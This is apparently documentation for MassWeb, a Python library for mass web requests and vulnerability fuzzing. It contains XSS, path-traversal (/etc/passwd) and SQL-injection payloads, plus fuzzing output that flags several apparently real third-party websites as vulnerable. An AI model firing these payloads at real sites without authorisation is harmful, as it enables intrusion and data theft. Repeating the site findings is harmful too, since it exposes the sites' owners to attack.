*massweb is currently beta-level software, we encourage you to submit bugs by emailing contact@hyperiongray.com.

The Problem it Solves

In PunkSPIDER 3.0 (the release we're currently working on) we have to scan several hundred million hosts in a very short amount of time over a Hadoop distributed cluster. There's a few big challenges with this:

  1. We have to do it super fast, so we can't simply do requests "one by one", we could take care of this with Hadoop job settings but this is highly inefficient - we need the native mapper and reducer to be multi-threaded
  2. It's highly variable how long a URL takes to get a response - we could be downloading a tiny 1kb page or we could be hitting a 200GB monster (think high-quality video), we need an upper bound to the amount of time that a large set of requests will take
  3. We're doing lots of requests here, we use about 100-150 high performance proxies when we scan, a proxy rotation system would be nice
  4. We need all of this to be simple, we want to be able to do all of this with just a few lines of code


MassWeb is a library meant for lightning-fast web application fuzzing.It attempts to solve all of the major problems of massive Internet-level scans in one convenient library. We use it in PunkSPIDER to scan several hundred million URLs for vulnerabilities over the course of just a few days (3 for our last scan).  Use it wisely and please don't do anything nasty with this.


To install MassWeb, simply type pip install massweb and you should get a working install on your system.

Current Feature Set

MassWeb Usage

There are two main use cases for MassWeb: mass requests of URLs or mass scanning for vulnerabilities of these URLs

Mass Requests

Mass requests is done via MassWeb's MassRequest object. Let's say, you're just interested in requesting a bunch of URLs in a reasonable amount of time, and don't want to deal with getting into the MassWeb API:

Python 2.7.3 (default, Jan  2 2013, 13:56:14) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from massweb.mass_requests.mass_request import MassRequest
>>> urls_to_fetch = ["http://www.hyperiongray.com", "http://course.hyperiongray.com/vuln1/", "http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/"]
>>> mr = MassRequest()
>>> mr.get_urls(urls_to_fetch)
>>> for r in mr.results:
...     print r
('http://www.hyperiongray.com', <Response [200]>)
('http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/', <Response [200]>)
('http://course.hyperiongray.com/vuln1/', <Response [200]>)

In other words, simply instantiate a MassRequest object and pass in any iterable to the get_urls function. Note that by default, the MassRequest object works with 10 threads and has a timeout of 10 seconds per URL (more on this later). What is returned is a tuple of the form:

(url_fetched, Response)

To retrieve results, you can use the mr.results attribute, which simply returns a tuple with the url fetched and a Python Requests response object, which gives you access to everything you could ever want about the response.

So let's consider a more complicated example, let's say we want to load in a bunch of URLs to fetch via GET, but we also have some POST requests we want to send. We do that by using the Target object to prepare our URLs and POST data before sending it:

>>> from massweb.mass_requests.mass_request import MassRequest
>>> from massweb.targets.target import Target
>>> target_1 = Target(url = "http://course.hyperiongray.com/vuln1", data = {"password" : "blh123"}, ttype = "post")
>>> target_2 = Target(url = "http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/", data = {"how" : "I'm good thx"}, ttype = "post")
>>> target_3 = Target(url = "http://www.hyperiongray.com/", ttype = "get")
>>> targets = [target_1, target_2, target_3]
>>> mr = MassRequest()
>>> mr.request_targets(targets)
>>> for r in mr.results:
...     print r
(<massweb.targets.target.Target object at 0x15496d0>, <Response [200]>)
(<massweb.targets.target.Target object at 0x1549650>, <Response [200]>)
(<massweb.targets.target.Target object at 0x1549490>, <Response [200]>)
>>> for r in mr.results:
...     print r[0], r[1].status_code
http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/ 200
http://www.hyperiongray.com/ 200
http://course.hyperiongray.com/vuln1 200

Again, pretty simple, just create a Target object with the parameters url, data (if it's a POST request), and ttype of "post" or "get". Put these in some kind of iterable and pass it off to mr.request_targets(), which does all of the work for you. What is returned is a tuple with the Target object (which casts to a URL) and a Python Requests Response object.

This is all great, but it's called MASSWeb, not fetch-me-3-urls-web. Let's see how we could conduct mass requests with this thing. Let's say we have a series of about 1000 URLs and we want them fast, we don't have time to wait to make sure our data is perfect, we want some quick and dirty responses if possible and if they take too long, produce a timeout. First, let's say you have a file called urls.txt of 1000 URLs and we want them in less then 2000 seconds or 2 seconds per URL. In other words, if it's not a URL that can be fetched quickly, move on. This can be useful for things like web crawling when you have no idea how long a target is going to take to respond and get you your data, so regardless of whether it's a networking issue, too-much-data issue or anything else, we want a hard timeout of 2 seconds per URL. Here's how we would do that:

>>> from massweb.mass_requests.mass_request import MassRequest
>>> mr = MassRequest(num_threads = 20, time_per_url = 2, proxy_list = [{"http":"http://user:password@"}, {"http":"http://user:password@"}])
>>> f = open("../urls.txt")
>>> mr.get_urls(f)
>>> len(mr.results)
>>> for i in range(1,10):
...     print mr.results[i]
('http://www.abcselfstorage.co.uk/', '__PNK_REQ_FAILED')
('http://www.abcskiphirews32.co.uk/', '__PNK_REQ_FAILED')
('http://abcskateboarding.co.uk/', <Response [404]>)
('http://www.abcsalestraining.co.uk/', <Response [200]>)
('http://www.abcservice.co.uk/', <Response [200]>)
('http://www.abcseaangling.co.uk/', <Response [200]>)
('http://www.abcselfdrive.co.uk/', <Response [404]>)
('http://www.abcselfstore.co.uk/storage-blogwp-login.php?redirect_to=http%3A%2F%2Fwww.abcselfstore.co.uk%2Fstorage-blog%2Fwp-admin%2F&reauth=1', <Response [404]>)
('http://www.abcselfstore.co.uk/abc24-hour-access.html', <Response [200]>)

We've already seen what is returned in normal cases, but the first couple of items show a funny __PNK_REQ_FAILED string being returned instead of the Python Requests Response object that we expect. These are URLs that were not fetched properly for whatever reason, usually some kind of TCP timeout or an exception in Python Requests. Similarly if getting a URL times out (thread timeout, not TCP timeout), then __PNK_THREAD_TIMEOUT is returned. The proxy list is just a list of proxies formatted like this specifies. Currently, requests get routed through proxies specified in the list at random, though we are currently working on improving this.

Web Application Fuzzing

MassWeb is also a web application scanner. Let's scan some websites!

We're going to take a look at the main (and only for now) scanning class, the WebFuzzer class. This works by:

  1. creating a set of Payloads that will get inserted into GET and POST parameters
  2. adding Targets (GET or POST requests to be performed) to the object
  3. Identifying additional POST requests on the GET requests specified, if you'd like
  4. Creating a list of "Fuzzy Targets" (Targets with payloads attached to them)
  5. Calling the .fuzz() method

The web app fuzzer allows you the same control that the MassRequest object allows you - it's automatically threaded, and you can set how much time you would like to allow it to take (it's also quite fast). That might sound like few steps to get up and running, but it's actually quite easy. Let's see it in action with a simple web app fuzzer:

	from massweb.payloads.payload import Payload
    xss_payload = Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list = ["xss"])
    trav_payload = Payload('../../../../../../../../../../../../../../../../../../etc/passwd', check_type_list = ["trav"])
    sqli_xpathi_payload = Payload("')--", check_type_list = ["sqli", "xpathi"])

    wf = WebFuzzer(num_threads = 30, time_per_url = 5, proxy_list = [{"http":"http://user:password@"}, {"http":"http://user:password@"}])

    print "Targets list pre post determination:"
    for target in wf.targets:
        print target

    print "Targets list after additional injection points have been found:"
    for target in wf.targets:
        print target.url, target.data

    print "FuzzyTargets list:"
    for ft in wf.fuzzy_targets:
        print ft, ft.ttype, ft.data

    print "Results of our fuzzing:"
    for r in wf.fuzz():
        print r, r.fuzzy_target.ttype, r.fuzzy_target.payload


Let's run through the above code, first we create a Payload object, where we add the payload string and a check type list. The check_type_list marks the vulnerability or vulnerabilities that your payload is testing for - valid ones are: mxi (mail header injection), osci (os command injection), sqli (SQL injection), trav (path traversal), xpathi (XPath injection), and xss (cross site scripting). The first two test for XSS and Path Traversal, while the third one is a valid payload for both SQL Injection and XPath Injection. Then we instantiate the WebFuzzer() object, passing in some of our favorite parameters num_threads and time_per_url, and add the payloads to it. Next up, we add our targets, we chose in the above to just add targets via a URL, but this could also be done by adding a Target object and the .add_target() method, which would look something like the following:

	from massweb.fuzzers.web_fuzzer import WebFuzzer
    wf = WebFuzzer()
    target_1 = Target("http://www.hyperiongray.com")
	target_2 = Target("http://course.hyperiongray.com/vuln1", data = {"password" : "blah"}, ttype = "post")

The advantage to specifying a Target object instead of adding targets via a URL string is that you can explicitly specify POST requests that you'd like to be included in your scanning. However, in most cases this is a pain, this information would have to be determined by a web scraping script of some sort to determine valid forms, valid parameters within those forms, etc. We wanted an easier way. In the above example (Web App Fuzzing Example 1) on line 26, calling wf.determine_posts_from_targets() will reach out to the existing Target set and try to find POST requests for you (note: this only supports finding basic forms for now, not AJAX POSTs or others) and automatically adds them to the target set

Following that, we must create our set of GET and POST requests with payloads inserted explicitly, which is done via the wf.generate_fuzzy_targets() method. You can access the FuzzyTarget classes that this creates by the .fuzzy_targets object attribute. FuzzyTargets are exactly like Targets, except they include the payload that was used to generate it, which can be accessed via the .payload attribute on a FuzzyTargets class.

Once the FuzzyTargets are generated, we can fuzz with wf.fuzz() which outputs a Result object. A result object is simply a result dictionary (e.g. "results": {"xpathi": False, "sqli": False}) and the FuzzyTarget object that achieved this result. When cast to string, a Result object returns valid JSON.

So let's visualize all of that so that it makes a bit more sense:

Targets list pre post determination:


Targets list after additional injection points have been found:

http://course.hyperiongray.com/vuln1 None
http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/ None
http://www.wpsurfing.co.za/?feed=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E None
http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&amp;ProName=1 None
http://www.gayoutdoors.com/page.cfm?snippetset=yes&amp;typeofsite=snippetdetail&amp;ID=1368&amp;Sectionid=1 None
http://www.dobrevsource.org/index.php?id=1 None
http://www.sfgcd.com/Search.asp {u'SubmitSearch': '', u'KeyWord': ''}
http://course.hyperiongray.com/formhandler.php {u'password': ''}
http://www.sfgcd.com/ProductsBuy.asp?Action=Buy {}
http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/formhandler.php {u'how': ''}

FuzzyTargets list:

http://www.wpsurfing.co.za/?feed=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E get None
http://www.wpsurfing.co.za/?feed=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd get None
http://www.wpsurfing.co.za/?feed=%27%29-- get None
http://www.sfgcd.com/ProductsBuy.asp?ProNo=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&ProName=1 get None
http://www.sfgcd.com/ProductsBuy.asp?ProNo=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&ProName=1 get None
http://www.sfgcd.com/ProductsBuy.asp?ProNo=%27%29--&ProName=1 get None
http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&ProName=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E get None
http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&ProName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd get None
http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&ProName=%27%29-- get None
http://www.gayoutdoors.com/page.cfm?snippetset=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&typeofsite=snippetdetail&ID=1368&Sectionid=1 get None
http://www.gayoutdoors.com/page.cfm?snippetset=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&typeofsite=snippetdetail&ID=1368&Sectionid=1 get None
http://www.gayoutdoors.com/page.cfm?snippetset=%27%29--&typeofsite=snippetdetail&ID=1368&Sectionid=1 get None
http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&ID=1368&Sectionid=1 get None
http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&ID=1368&Sectionid=1 get None
http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=%27%29--&ID=1368&Sectionid=1 get None
http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&Sectionid=1 get None
http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&Sectionid=1 get None
http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=%27%29--&Sectionid=1 get None
http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=1368&Sectionid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E get None
http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=1368&Sectionid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd get None
http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=1368&Sectionid=%27%29-- get None
http://www.dobrevsource.org/index.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E get None
http://www.dobrevsource.org/index.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd get None
http://www.dobrevsource.org/index.php?id=%27%29-- get None
http://www.sfgcd.com/Search.asp post {u'SubmitSearch': "')--", u'KeyWord': ''}
http://www.sfgcd.com/Search.asp post {u'SubmitSearch': "')--", u'KeyWord': ''}
http://www.sfgcd.com/Search.asp post {u'SubmitSearch': "')--", u'KeyWord': ''}
http://www.sfgcd.com/Search.asp post {u'SubmitSearch': '', u'KeyWord': "')--"}
http://www.sfgcd.com/Search.asp post {u'SubmitSearch': '', u'KeyWord': "')--"}
http://www.sfgcd.com/Search.asp post {u'SubmitSearch': '', u'KeyWord': "')--"}
http://course.hyperiongray.com/formhandler.php post {u'password': "')--"}
http://course.hyperiongray.com/formhandler.php post {u'password': "')--"}
http://course.hyperiongray.com/formhandler.php post {u'password': "')--"}
http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/formhandler.php post {u'how': "')--"}
http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/formhandler.php post {u'how': "')--"}
http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/formhandler.php post {u'how': "')--"}

Results of our fuzzing:

{"url": "http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&ProName=%27%29--", "results": {"xpathi": false, "sqli": false}} get ')--
{"url": "http://www.wpsurfing.co.za/?feed=%27%29--", "results": {"xpathi": false, "sqli": false}} get ')--
{"url": "http://www.wpsurfing.co.za/?feed=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E", "results": {"xss": true}} get "><ScRipT>alert(31337)</ScrIpT>
{"url": "http://www.wpsurfing.co.za/?feed=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", "results": {"trav": false}} get ../../../../../../../../../../../../../../../../../../etc/passwd
{"url": "http://www.sfgcd.com/ProductsBuy.asp?ProNo=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&ProName=1", "results": {"trav": false}} get ../../../../../../../../../../../../../../../../../../etc/passwd
{"url": "http://www.gayoutdoors.com/page.cfm?snippetset=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&typeofsite=snippetdetail&ID=1368&Sectionid=1", "results": {"trav": false}} get ../../../../../../../../../../../../../../../../../../etc/passwd
{"url": "http://www.sfgcd.com/ProductsBuy.asp?ProNo=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&ProName=1", "results": {"xss": false}} get "><ScRipT>alert(31337)</ScrIpT>
{"url": "http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&ProName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", "results": {"trav": false}} get ../../../../../../../../../../../../../../../../../../etc/passwd
{"url": "http://www.gayoutdoors.com/page.cfm?snippetset=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&typeofsite=snippetdetail&ID=1368&Sectionid=1", "results": {"xss": false}} get "><ScRipT>alert(31337)</ScrIpT>
{"url": "http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&ID=1368&Sectionid=1", "results": {"xss": true}} get "><ScRipT>alert(31337)</ScrIpT>
{"url": "http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&ID=1368&Sectionid=1", "results": {"trav": false}} get ../../../../../../../../../../../../../../../../../../etc/passwd
{"url": "http://www.gayoutdoors.com/page.cfm?snippetset=%27%29--&typeofsite=snippetdetail&ID=1368&Sectionid=1", "results": {"xpathi": false, "sqli": false}} get ')--
{"url": "http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=1368&Sectionid=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E", "results": {"xss": true}} get "><ScRipT>alert(31337)</ScrIpT>
{"url": "http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=%27%29--&ID=1368&Sectionid=1", "results": {"xpathi": false, "sqli": false}} get ')--
{"url": "http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E&Sectionid=1", "results": {"xss": false}} get "><ScRipT>alert(31337)</ScrIpT>
{"url": "http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=%27%29--&Sectionid=1", "results": {"xpathi": false, "sqli": false}} get ')--
{"url": "http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=1368&Sectionid=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", "results": {"trav": false}} get ../../../../../../../../../../../../../../../../../../etc/passwd
{"url": "http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=1368&Sectionid=%27%29--", "results": {"xpathi": false, "sqli": true}} get ')--
{"url": "http://www.gayoutdoors.com/page.cfm?snippetset=yes&typeofsite=snippetdetail&ID=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&Sectionid=1", "results": {"trav": false}} get ../../../../../../../../../../../../../../../../../../etc/passwd
{"url": "http://www.dobrevsource.org/index.php?id=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E", "results": {"xss": false}} get "><ScRipT>alert(31337)</ScrIpT>
{"url": "http://www.dobrevsource.org/index.php?id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", "results": {"trav": true}} get ../../../../../../../../../../../../../../../../../../etc/passwd
{"url": "http://www.dobrevsource.org/index.php?id=%27%29--", "results": {"xpathi": false, "sqli": false}} get ')--
{"url": "http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&ProName=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E", "results": {"xss": false}} get "><ScRipT>alert(31337)</ScrIpT>
{"url": "http://course.hyperiongray.com/formhandler.php", "results": {"xss": false}} post "><ScRipT>alert(31337)</ScrIpT>
{"url": "http://course.hyperiongray.com/formhandler.php", "results": {"xpathi": false, "sqli": false}} post ')--
{"url": "http://course.hyperiongray.com/formhandler.php", "results": {"trav": false}} post ../../../../../../../../../../../../../../../../../../etc/passwd
{"url": "http://www.sfgcd.com/Search.asp", "results": {"xpathi": false, "sqli": false}} post ')--
{"url": "http://www.sfgcd.com/Search.asp", "results": {"xss": false}} post "><ScRipT>alert(31337)</ScrIpT>
{"url": "http://www.sfgcd.com/Search.asp", "results": {"trav": false}} post ../../../../../../../../../../../../../../../../../../etc/passwd
{"url": "http://www.sfgcd.com/Search.asp", "results": {"xss": false}} post "><ScRipT>alert(31337)</ScrIpT>
{"url": "http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/formhandler.php", "results": {"xss": false}} post "><ScRipT>alert(31337)</ScrIpT>
{"url": "http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/formhandler.php", "results": {"trav": false}} post ../../../../../../../../../../../../../../../../../../etc/passwd
{"url": "http://www.sfgcd.com/Search.asp", "results": {"trav": false}} post ../../../../../../../../../../../../../../../../../../etc/passwd
{"url": "http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/formhandler.php", "results": {"xpathi": false, "sqli": false}} post ')--
{"url": "http://www.sfgcd.com/Search.asp", "results": {"xpathi": false, "sqli": false}} post ')--
{"url": "http://www.sfgcd.com/ProductsBuy.asp?ProNo=%27%29--&ProName=1", "results": {"xpathi": false, "sqli": false}} get ')--

Object Reference


    __init__(self, targets=[], payloads=[], num_threads=10, time_per_url=10, request_timeout=10, proxy_list=[{}])
    add_payload(self, payload)
    add_payload_from_string(self, payload_str, check_type_list)
    add_target(self, target)
    add_target_from_url(self, url, data=None)
    analyze_response(self, ftarget, response)
    determine_posts_from_targets(self, dedupe=True)
    Instance variables
    __init__(self, payload_str, check_type_list=[])
    Instance variables

    __init__(self, fuzzy_target, result_dic={})
    Instance variables
    __init__(self, url, data=None, ttype='get')
    Instance variables
    __init__(self, url, ttype='get', data=None, payload=None)